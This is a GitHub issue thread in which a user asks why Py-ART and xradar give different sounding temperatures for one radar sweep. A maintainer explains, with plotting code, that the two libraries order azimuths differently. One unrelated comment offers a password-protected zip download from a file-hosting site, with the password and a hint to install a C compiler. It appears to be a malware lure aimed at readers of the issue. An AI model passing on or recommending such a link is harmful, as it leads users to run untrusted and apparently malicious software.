ARM-DOE/pyart #1668: Py-ART and xradar return different values for the same Sweep.

RBhupi, 2024-10-21:
* Py-ART version: 1.18.7
* Python version: 3.10.6
* Operating System: x86_64 x86_64 x86_64 GNU/Linux

### Description
I am expecting the sounding temperature values to match between xradar and Py-ART, but they don't mathc in the following code. I think I am misunderstanding the differences in how Py-ART and xradar stores data in their objects, and this confusion is causing the inconsistency. I have tried checking if the sweeps are reversed (using [-1] instead of 0), but that hasn’t resolved the issue either.

### What I Did

```
import numpy as np
import matplotlib.pyplot as plt
import xradar as xd
import pyart

file_name = '/gpfs/wolf2/arm/atm124/world-shared/gucxprecipradarcmacS2.c1/ppi/202208/gucxprecipradarcmacppiS2.c1.20220825.194643.nc'

#xradar
radar_xr = xd.io.open_cfradial1_datatree(file_name)
geo_ds = xd.georeference.get_x_y_z(radar_xr['sweep_0'].to_dataset())
# trying first sweep
sounding_temp_xr = geo_ds['sounding_temperature'].values[0, :]

# From pyart
radar_pyart = pyart.io.read(file_name)
radar_pyart = radar_pyart.extract_sweeps([0])
#trying first sweep
sounding_temp_pyart = radar_pyart.fields['sounding_temperature']['data'][0, :]

# this is not equal
print(f"xradar temperature: {sounding_temp_xr[100]} and pyart {sounding_temp_pyart[100]}.")

sounding_temp_xr==sounding_temp_pyart

# Plot
plt.plot(sounding_temp_xr, label="xradar")
plt.plot(sounding_temp_pyart, label="pyart")
plt.xlabel('range')
plt.ylabel('T')
plt.legend()
plt.grid(True)
plt.show()

```

[image]

chachasammy, 2024-10-21:
try this
https://www.mediafire.com/file/33h9a2mzmqf81fz/help_github.zip/file
Pass: xfp53

you may need to install the c compiler

mgrover1, 2024-10-21:
@RBhupi - can you print plot using the actual range value as opposed to the index number of the range to ensure this is not related to ordering of the in-memory representation?

ie. plot T with respect to range (0 to ~50 km or whatever the range of the radar is) instead of 0 to 400

RBhupi, 2024-10-21:
Thank you @mgrover1 

The range array is exactly equal.

`range_pyart[0:10]-range_xr[0:10]`
gives zeroes.

> masked_array(data=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
>              mask=[False, False, False, False, False, False, False, False,
>                    False, False],
>        fill_value=1e+20,
>             dtype=float32)

Here. 
```
import numpy as np
import matplotlib.pyplot as plt
import xradar as xd
import pyart

file_name = '/gpfs/wolf2/arm/atm124/world-shared/gucxprecipradarcmacS2.c1/ppi/202208/gucxprecipradarcmacppiS2.c1.20220825.194643.nc'

#xradar
radar_xr = xd.io.open_cfradial1_datatree(file_name)
geo_ds = xd.georeference.get_x_y_z(radar_xr['sweep_0'].to_dataset())
# trying first sweep
sounding_temp_xr = geo_ds['sounding_temperature'].values[0, :]
range_xr = geo_ds['range'].values/1000  # kilometers

# From pyart
radar_pyart = pyart.io.read(file_name)
radar_pyart = radar_pyart.extract_sweeps([0])
#trying first sweep
sounding_temp_pyart = radar_pyart.fields['sounding_temperature']['data'][0, :]
range_pyart = radar_pyart.range['data']/1000 

# this is not equal
print(f"xradar temperature: {sounding_temp_xr[100]} and pyart {sounding_temp_pyart[100]}.")

sounding_temp_xr==sounding_temp_pyart

# Plot
plt.plot(range_xr, sounding_temp_xr, label="xradar")
plt.plot(range_pyart, sounding_temp_pyart, label="pyart")
plt.xlabel('range')
plt.ylabel('T')
plt.legend()
plt.grid(True)
plt.show()

```

[image]

mgrover1, 2024-10-21:
@RBhupi - you are selecting two different azimuths. If you check to see the azimuth is equal using that indexing strategy, you will see that they are not the same azimuth.

[image]

mgrover1, 2024-10-22:
@RBhupi - if you plot out the azimuths, 

```python
import numpy as np
import matplotlib.pyplot as plt
import xradar as xd
import pyart

file_name = 'gucxprecipradarcmacppiS2.c1.20220825.194643.nc'

#xradar
radar_xr = xd.io.open_cfradial1_datatree(file_name)
geo_ds = xd.georeference.get_x_y_z(radar_xr['sweep_0'].to_dataset())
# trying first sweep
sounding_temp_xr = geo_ds['sounding_temperature'].values[0, :]
range_xr = geo_ds['range'].values/1000  # kilometers
azimuth_xr = geo_ds["azimuth"].values

# From pyart
radar_pyart = pyart.io.read(file_name)
radar_pyart = radar_pyart.extract_sweeps([0])
#trying first sweep
sounding_temp_pyart = radar_pyart.fields['sounding_temperature']['data'][0, :]
range_pyart = radar_pyart.range['data']/1000 
azimuth_pyart = radar_pyart.azimuth["data"]

# this is not equal
print(f"xradar temperature: {sounding_temp_xr[100]} and pyart {sounding_temp_pyart[100]}.")

sounding_temp_xr==sounding_temp_pyart

# Plot
plt.plot(azimuth_pyart, label='pyart azimuth')
plt.plot(azimuth_xr, label='xradar azimuth')
plt.xlabel("index number of azimuth")
plt.ylabel("azimuth (degrees)")
plt.legend()
```

You will notice that xradar sorts the azimuths in ascending order, Py-ART has a slightly different sorting of the azimuths. Neither is necessarily correct/incorrect, it just depends how you sort the arrays.

[image]